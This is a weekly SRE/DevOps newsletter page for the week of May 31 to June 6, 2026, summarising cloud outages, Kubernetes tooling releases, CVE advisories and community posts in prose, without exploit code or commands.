On Call Brief

Your weekly SRE/DevOps briefing. Security patches, postmortems, releases, and community reads — curated for the on-call engineer.

Each brief is dated by its editorial week (not the companion podcast release schedule); when inbox or RSS ingest lags affected sourcing, we say so in the draft.

Latest: On Call Brief – Week of May 31–June 6, 2026

This week's brief is in draft — updates daily, publishes Sunday Last updated 2 hours ago (Jun 8, 2026 3:14 am EDT) Read last week’s brief →

Get the brief in your inbox

One short email a week. Written for engineers running production systems.

No spam. Unsubscribe any time. Protected by reCAPTCHA — Privacy & Terms apply.

Search every published brief by keyword, vendor, CVE, or topic.

CtrlK to focus search

On Call Brief – Week of May 31–June 6, 2026

2026-05-31 — 2026-06-06

Category:
Tags:

This week's top stories

1. The 28-Hour Meltdown: What Happened When AWS US-EAST-1 Overheated

  • Category: Deep Dive
  • What happened: AWS US-EAST-1 experienced a 28-hour outage caused by overheating issues in the data center infrastructure, impacting multiple AWS services across the region. The incident demonstrates how physical infrastructure failures can cascade through cloud services, affecting customers relying on the region for critical workloads. SRE teams should review their multi-region disaster recovery strategies and ensure they have adequate failover mechanisms configured for AWS US-EAST-1 dependencies. The outage also highlighted potential cost implications of the serverless 'pay what you use' model during incident response scenarios where automatic scaling and failover could trigger unexpected billing spikes. Source attribution: SRE Weekly analysis of the AWS US-EAST-1 overheating incident and its operational implications.
  • Takeaway: - Significant outages in AWS US-EAST-1 could affect services relying on this region, leading to potential downtime or degraded performance for users and applications hosted there.
  • Sources: Builder Aws via SRE Weekly, Feeds Dzone via SRE Weekly
  • Tags:

2. Google Cloud Suspends Railway's Production Account

  • Category: Community
  • What happened: On May 19, 2026, Google Cloud mistakenly suspended Railway's production account through an automated enforcement action, demonstrating risks in automated account management systems (Reddit r/aws). Separately, Google Cloud announced general availability of the Remote Model Context Protocol (MCP) Server for AlloyDB, enabling AI agents to securely access enterprise database content in real-time (Google Cloud Blog). SRE teams using Google Cloud should review their account compliance status and monitoring to prevent similar automated suspensions, while teams running AlloyDB can now leverage the MCP Server integration for AI agent implementations. Organizations should establish direct communication channels with Google Cloud support and implement comprehensive account status monitoring to detect and respond quickly to any automated enforcement actions.
  • Worth reading: Operators should be aware of the implications of automated actions in cloud environments, as they can lead to unintended service disruptions.
  • Sources: Reddit r/aws, Google Cloud Blog
  • Tags:

3. AWS Organizations emits CloudTrail events for account membership changes - Only took until 2026 to log when

  • Category: Community
  • What happened: AWS Organizations will now emit CloudTrail events for account membership changes, allowing organizations to track when accounts join or leave. This feature addresses a significant gap where such changes went unlogged, leading to confusion and potential security concerns.
  • Worth reading: This change improves visibility into account management within AWS Organizations, which can enhance security monitoring and incident response capabilities.
  • Source: Aws Amazon via Last Week in AWS
  • Tags:

4. KEDA: v2.20.0, v2.19.0

  • Category: Breaking Change
  • What happened: KEDA has released versions 2.19.0 and 2.20.0 with significant feature additions and a breaking change that requires operator attention. Version 2.19.0 introduces the new Kubernetes Resource Scaler and file-based authentication support for ClusterTriggerAuthentication, while 2.20.0 adds OpenSearch Scaler and Elastic Forecast Scaler capabilities. The critical change in 2.20.0 moves event recording to the new events.k8s.io API group, which may require RBAC updates and validation of event processing pipelines in clusters running Kubernetes 1.19 or later. Operators should test these versions in non-production environments first, particularly validating that event collection and monitoring systems continue to function correctly after the API group migration. Both releases include various scaling behavior improvements and bug fixes across multiple scalers that should improve overall KEDA reliability.
  • Do this Monday: The change to the events.k8s.io API group may affect deployments with custom RBAC settings, necessitating permission updates to ensure event recording functions correctly. This could lead to operational issues if not addressed before upgrading.
  • Sources: KEDA releases, KEDA releases
  • Tags:

5. Endpoint vendors built for known indicators now face adversaries that rewrite themselves between hops.

  • Category: Community
  • What happened: The article discusses how endpoint vendors are facing challenges from adversaries that can adapt and change their tactics between hops, making it difficult for traditional detection methods to keep up. It highlights the need for endpoint security solutions to evolve in response to these dynamic threats.
  • Worth reading: This shift in adversarial tactics may require updates to endpoint security strategies and tools to ensure they can effectively detect and respond to evolving threats - operators should consider reviewing their security posture.
  • Source: Techstrong Brief
  • Tags:

6. WEEK OF JUNE 1 – 7, 2026 Weekly Edition • Thursdays TLDR THIS WEEK - Robinhood Opens Platform to Autonomous

  • Category: Deep Dive
  • What happened: This week's edition highlights Robinhood's opening of its platform for autonomous trading, Sumo Logic's introduction of a SIEM platform to AWS European Sovereign Cloud, and a report on threat actors abusing ChatGPT chats to host fake outage pages and deliver malware. Additionally, it mentions CrowdStrike's takedown of the Glassworm threat.
  • Takeaway: The opening of Robinhood's platform to autonomous trading may introduce new risks and operational considerations for trading systems. The abuse of ChatGPT for malicious purposes highlights the need for vigilance against social engineering attacks. The introduction of a SIEM platform to AWS could enhance security monitoring capabilities for organizations operating in that environment.
  • Source: Security Boulevard Newsletters
  • Tags:

7. Cloudflare: 2 service incidents (Durable Objects and Log Explorer issues, Issues with TLS certificates using Lets

  • Category: Deep Dive
  • What happened: Cloudflare experienced service disruptions affecting Durable Objects and Log Explorer functionality, with Durable Objects showing elevated startup errors specifically in the Atlanta region and Log Explorer experiencing intermittent delays in log queries. A separate incident occurred with TLS certificates issued by Let's Encrypt certificate authority, though specific details of the TLS issue were not fully provided in the source material. SRE teams using Cloudflare should monitor their Durable Objects applications for any startup failures or performance degradation, particularly if deployed in the Atlanta region, and verify that TLS certificate renewals are functioning correctly for Let's Encrypt-issued certificates. Both incidents have been reported as resolved by Cloudflare Status, but operators should continue monitoring affected services and review recent certificate renewal logs as a precautionary measure.
  • Takeaway: This incident could have affected customer applications relying on Durable Objects and log data availability, particularly in the Atlanta region - operators should ensure their services are functioning correctly post-incident.
  • Sources: Cloudflare Status, Cloudflare Status
  • Tags:

8. Postmortem for my UK company database startup (2025)

  • Category: Deep Dive
  • What happened: The article provides a postmortem analysis of a database incident at a UK startup, detailing the causes of the outage, the response efforts, and lessons learned to improve future resilience.
  • Takeaway: - Understanding the incident response and recovery process can help teams prepare for similar outages - Insights into database management and operational resilience are valuable for improving practices.
  • Source: Developerwithacat via Hacker News (incidents)
  • Discussion: https://news.ycombinator.com/item?id=48346016
  • Tags:

9. etcd: v3.7.0-rc.0, v3.6.12, v3.5.31

  • Category: Breaking Change
  • What happened: Etcd has released three new versions simultaneously: v3.7.0-rc.0 (release candidate), v3.6.12 (stable), and v3.5.31 (maintenance). All releases include various changes documented in their respective changelogs and contain potential breaking changes that require careful review before deployment. Operators should consult the upgrade guides for their target version before proceeding with any upgrades, as breaking changes may impact existing configurations and require planning. Installation instructions are available for Linux, macOS, and Docker across all versions. These releases follow etcd's standard multi-version support model, allowing operators to choose appropriate upgrade paths based on their stability requirements and change tolerance.
  • Do this Monday: Operators should be aware of the potential breaking changes when upgrading to this release. Following the upgrade guides is crucial to ensure compatibility and stability.
  • Sources: etcd releases, etcd releases, etcd releases
  • Tags:

CVE & Security

1. CVE-2026-9255 - Tool Execution Without Authorization via Piped Stdin in Kiro CLI - Turns out piping untrusted

  • Category: Security / Patch
  • What happened: CVE-2026-9255 describes a vulnerability in Kiro CLI where untrusted content piped into the tool can allow attackers to execute arbitrary shell commands. This occurs because the interactive prompt accepts stdin as confirmation. Users are advised to update to version 1.28.0 to mitigate this risk.
  • Do this Monday: This vulnerability could lead to unauthorized command execution in production environments if Kiro CLI is used with untrusted input - update to 1.28.0 is critical.
  • Source: Aws Amazon via Last Week in AWS
  • Tags:

2. CVE-2026-9291 - Insecure Deserialization in Amazon Braket SDK Job Results Processing - Quantum computing has

  • Category: Security / Patch
  • What happened: CVE-2026-9291 describes an insecure deserialization vulnerability in the Amazon Braket SDK that affects job results processing. The SDK improperly trusts a JSON field to determine whether to execute `pickle.loads()`, creating a significant security risk. Users are advised to upgrade to version 1.117.0 and review S3 write access permissions.
  • Do this Monday: This vulnerability could allow unauthorized code execution if exploited, impacting the security of applications using the Amazon Braket SDK. Immediate upgrade is recommended to mitigate risks.
  • Source: Aws Amazon via Last Week in AWS
  • Tags:

3. WP Maps Pro bug exploited to create admin accounts on WordPress sites

  • Category: Security / Patch
  • What happened: Hackers are exploiting a vulnerability in the WP Maps Pro plugin for WordPress that enables the creation of unauthorized administrator accounts without authentication. This poses a significant security risk for affected sites.
  • Do this Monday: - Websites using the WP Maps Pro plugin are at risk of unauthorized access and potential compromise due to this vulnerability.
  • Source: Bleeping Computer
  • Tags:

4. Toxic Flows: When Your Agent Skill Becomes a Supply Chain Attack

  • Category: Security / Patch
  • What happened: Snyk's ToxicSkills research analyzed over 3,000 agent skills and discovered that 36% contained security flaws, with 13% exhibiting critical vulnerabilities including credential theft pathways that could enable supply chain attacks. These vulnerabilities in agent skills create attack vectors where malicious actors can exploit trusted automation components to gain unauthorized access to systems and sensitive data. SRE and DevOps teams should implement mandatory security reviews for all agent skills before installation, establish allow-lists for approved skills from trusted sources, and regularly audit existing agent deployments for known vulnerabilities. Organizations should treat agent skills with the same security rigor applied to third-party dependencies and implement monitoring to detect unusual behavior from deployed agents. The research underscores that agent skills represent a significant and often overlooked attack surface in modern infrastructure automation.
  • Do this Monday: The high percentage of skills with security flaws indicates potential risks in using third-party skills, which could lead to supply chain attacks if not properly vetted.
  • Sources: Techstrong Brief, Techstrong Brief
  • Tags:

5. Unidentified RAT pushes NetSupport RAT, (Mon, Jun 1st)

  • Category: Security / Patch
  • What happened: This report details an unidentified RAT infection that occurred on May 27, 2026, which was followed by the deployment of a NetSupport Manager RAT. The initial RAT has been generating encoded traffic to a C2 server since April 2026. The report includes indicators of compromise, such as URLs associated with the SmartApeSG ClickFix campaign and the IP addresses of the C2 servers for both the initial RAT and the NetSupport RAT.
  • Do this Monday: Operators should be aware of the ongoing RAT infection and the associated C2 traffic, as it may indicate a broader security issue that could affect their systems. Monitoring for the listed indicators of compromise is crucial to prevent potential breaches.
  • Source: SANS ISC
  • Tags:

6. DevOps'ish 311: Poisoned Repos, Hallucinating Executives, and More

  • Category: Security / Patch
  • What happened: Docker Engine version 29.4.3 has been released with security enhancements including AppArmor, SELinux, and seccomp protections to address CVE-2026-31431, a Linux kernel privilege escalation vulnerability that affects containerized environments. The update specifically aims to rectify issues caused by a previous incomplete fix for this vulnerability. Additionally, the Kubernetes Security Response Committee has announced they will update CVE records for three long-standing unfixed vulnerabilities on June 1, 2026, and will provide remediation strategies for cluster administrators at that time. SRE teams should immediately upgrade to Docker Engine v29.4.3 to mitigate the privilege escalation risk and prepare for the upcoming Kubernetes security guidance by monitoring official channels for the June 1st vulnerability updates. These updates are critical for maintaining container and cluster security posture according to DevOps'ish reporting.
  • Do this Monday: This update is critical for maintaining the security of Docker environments, especially for those using 32-bit binaries. Operators should prioritize upgrading to this version to mitigate potential privilege escalation risks.
  • Sources: Devopsish via DevOps'ish, via DevOps'ish
  • Tags:

Releases

1. Dutch Authorities Dismantle Botnet Linked to 17 Million Infected Devices

  • Category: Release
  • What happened: Dutch authorities have dismantled a botnet that controlled at least 17 million infected devices, including computers, tablets, smartphones, and IoT devices, to conduct malicious attacks. The operation involved over 200 servers located in the Netherlands.
  • Do this Monday: - This takedown may reduce the risk of attacks originating from these devices, but operators should remain vigilant for potential residual effects or retaliatory actions from malicious actors.
  • Source: Thehackernews via The Hacker News (security)
  • Tags:

2. From Kubernetes Dashboard to Headlamp: Understanding the Transition

  • Category: Release
  • What happened: The Kubernetes Dashboard has been archived, and users are encouraged to transition to Headlamp, which builds on the Dashboard's foundation while adding new features such as multi-cluster visibility and extensibility through plugins. The article provides guidance on how to navigate this transition, highlighting that many familiar workflows remain unchanged while offering improvements in usability and resource management.
  • Do this Monday: Operators using Kubernetes Dashboard need to migrate to Headlamp, which may require adjustments in workflows but promises enhanced capabilities and a familiar interface.
  • Source: Kubernetes Blog
  • Tags:

3. System-wide issues with self-signed certificates under Docker

  • Category: Release
  • What happened: The Reddit discussion highlights system-wide issues encountered when using self-signed certificates with Docker. Users report various problems related to certificate validation and trust, which can lead to connectivity issues and security concerns in containerized environments.
  • Do this Monday: Operators using self-signed certificates in Docker environments may face connectivity issues and potential security vulnerabilities due to improper certificate handling - this could affect service reliability and security posture.
  • Source: Reddit r/docker
  • Tags:

4. Overcoming IP Churn in Ephemeral DevOps Environments Using Userspace Overlays

  • Category: Release
  • What happened: The article discusses the challenges of IP churn in ephemeral DevOps environments, particularly with modern tools like Kubernetes that create dynamic workloads. Traditional networking relies on static IPs, leading to issues when containers restart or move, breaking stateful connections. Various solutions exist, such as service meshes and overlay networks, but each comes with operational tradeoffs. The article advocates for decoupling network identity from physical infrastructure to enhance resilience in continuous deployment pipelines, suggesting userspace overlay networks as a promising approach.
  • Do this Monday: Understanding IP churn and its impact on stateful connections is crucial for maintaining service reliability in dynamic environments. Adopting userspace overlay networks could improve resilience and reduce dependency on traditional networking methods.
  • Source: DevOps.com
  • Tags:

5. AWS Weekly Roundup: Claude Opus 4.8 on AWS, Aurora MySQL with Kiro Powers, and more (June 1, 2026)

  • Category: Release
  • What happened: Claude Opus 4.8 has been released on both AWS and Microsoft Azure Foundry, bringing enhanced coding capabilities including autonomous task execution, improved context handling, and the ability to maintain plans across workflow stages according to AWS What's New and Azure Blog announcements. The model specifically targets software development and enterprise agentic workflows with improved reliability for multi-step operations and complex coding tasks. SRE teams using Claude-powered automation or development workflows should evaluate version 4.8 for potential integration, particularly if current implementations could benefit from enhanced context persistence across task stages. AWS users can access the model through their existing Claude services, while Azure users can deploy through Microsoft Foundry. Teams should test the enhanced autonomous execution capabilities in non-production environments before implementing in critical workflows, as the improved context handling may change existing automation behavior patterns.
  • Do this Monday: The introduction of Claude Opus 4.8 could significantly enhance coding workflows, while the new Resilience Hub offers SREs a structured approach to manage application resilience, which may lead to improved service reliability and compliance.
  • Sources: AWS What's New, Aws Amazon via Last Week in AWS, Azure Blog
  • Tags:

6. Multi-Region event-driven failover architecture with Amazon EventBridge and Route 53

  • Category: Release
  • What happened: This article outlines a multi-region event-driven architecture using Amazon EventBridge, API Gateway, and Route 53 for high availability and disaster recovery. It describes how to implement automatic failover between AWS regions, ensuring that event processing remains independent and efficient. The architecture leverages Route 53 health checks to monitor API Gateway endpoints and reroute traffic to healthy regions, while DynamoDB global tables ensure data availability across regions. This solution is particularly beneficial for organizations with strict availability requirements, supporting both planned and unplanned outages.
  • Do this Monday: This architecture can significantly enhance the resilience of applications by ensuring automatic failover and reducing latency through regional independence. It is crucial for teams managing critical applications that require high availability and disaster recovery capabilities.
  • Source: AWS Compute Blog
  • Tags:

Lightning links

Human Stories

The old saying that "everything fails, the only question is when" took on new dimensions this week as we watched automation both save and sabotage operations across the industry. Railway learned this the hard way when Google Cloud's automated enforcement systems mistakenly suspended their production account, while AWS finally decided to log organizational changes after years of that particular blind spot quietly haunting compliance teams. The 28-hour AWS US-EAST-1 meltdown reminds us that even the most sophisticated cloud infrastructure can be humbled by something as fundamental as cooling systems - a sobering reminder that our digital abstractions still depend on very physical realities. What strikes me most is how these incidents reveal the growing complexity of managing trust in automated systems: we build them to reduce human error, but when they fail, the blast radius often exceeds what any individual mistake could have caused.

Also worth reading

Gavriel Cohen found his own code inside OpenClaw, so he walked away (The New Stack)

Gavriel Cohen discovered his own code, NanoPDF, included in OpenClaw, which raised concerns about the project's security and code quality. He experienced issues with the tool, including unexpected access to all WhatsApp messages instead of just the intended group. Cohen highlighted the risks of a gr

RDP failing after update KB5087537 and KB5087065 (Reddit r/sysadmin)

A user reports that after installing updates KB5087537 and KB5087065 on a Windows Server 2016 VM, Remote Desktop Protocol (RDP) fails to connect. The user notes that the logon is successful until the password is entered, and they have not found any documentation linking the updates to RDP issues. Th

The DIY platform trap that’s burning out engineering teams (The New Stack)

The article discusses the pitfalls of DIY platform engineering, highlighting how automation can lead to increased complexity rather than reducing it. As teams automate workflows, they create layers of scripts and tools that become difficult to maintain and understand over time. When these automation

View Full Brief →

Past Briefs

2026-06-07 — 2026-06-13

On Call Brief – Week of June 7–13, 2026

Draft updated 2 hours ago (Jun 8, 2026 3:14 am EDT)

Community Deep Dive Release Security / Patch
2026-05-31 — 2026-06-06

On Call Brief – Week of May 31–June 6, 2026

Updated 2 days ago (Jun 6, 2026 3:05 am EDT)

Breaking Change Community Deep Dive Release Security / Patch
2026-05-24 — 2026-05-30

On Call Brief – Week of May 24–30, 2026

Updated 1 week ago (May 30, 2026 3:08 am EDT)

Breaking Change Community Deep Dive Release Security / Patch
2026-05-17 — 2026-05-23

On Call Brief – Week of May 17–23, 2026

Updated 2 weeks ago (May 23, 2026 3:04 am EDT)

Community Deep Dive Release Security / Patch
2026-05-10 — 2026-05-16

On Call Brief – Week of May 10–16, 2026

Updated 3 weeks ago (May 16, 2026 3:05 am EDT)

Breaking Change Community Deep Dive Release Security / Patch
2026-05-03 — 2026-05-09

On Call Brief – Week of May 3–9, 2026

Updated 1 month ago (May 7, 2026 3:08 am EDT)

Breaking Change Deep Dive Release Security / Patch
2026-04-26 — 2026-05-02

On Call Brief – Week of April 26–May 2, 2026

Updated 1 month ago (Apr 30, 2026 3:06 am EDT)

Community Deep Dive Release Security / Patch
2026-04-19 — 2026-04-25

On Call Brief – Week of April 19–25, 2026

Updated 1 month ago (Apr 28, 2026 7:22 pm EDT)

Community Deep Dive Release Security / Patch
2026-04-12

On Call Brief – Week of 2026-04-12

Updated 2 months ago (Apr 16, 2026 1:48 pm EDT)

Breaking Change Deep Dive Release Security / Patch
2026-04-05

On Call Brief – Week of 2026-04-05

Updated 2 months ago (Apr 9, 2026 3:06 am EDT)

Breaking Change Deep Dive Release Security / Patch
2026-03-29

On Call Brief – Week of 2026-03-29

Updated 2 months ago (Apr 2, 2026 3:05 am EDT)

Community Deep Dive Release Security / Patch
2026-03-22

On Call Brief – Week of 2026-03-22

Updated 2 months ago (Mar 26, 2026 3:05 am EDT)

Breaking Change Community Deep Dive Release Security / Patch
Scroll to Top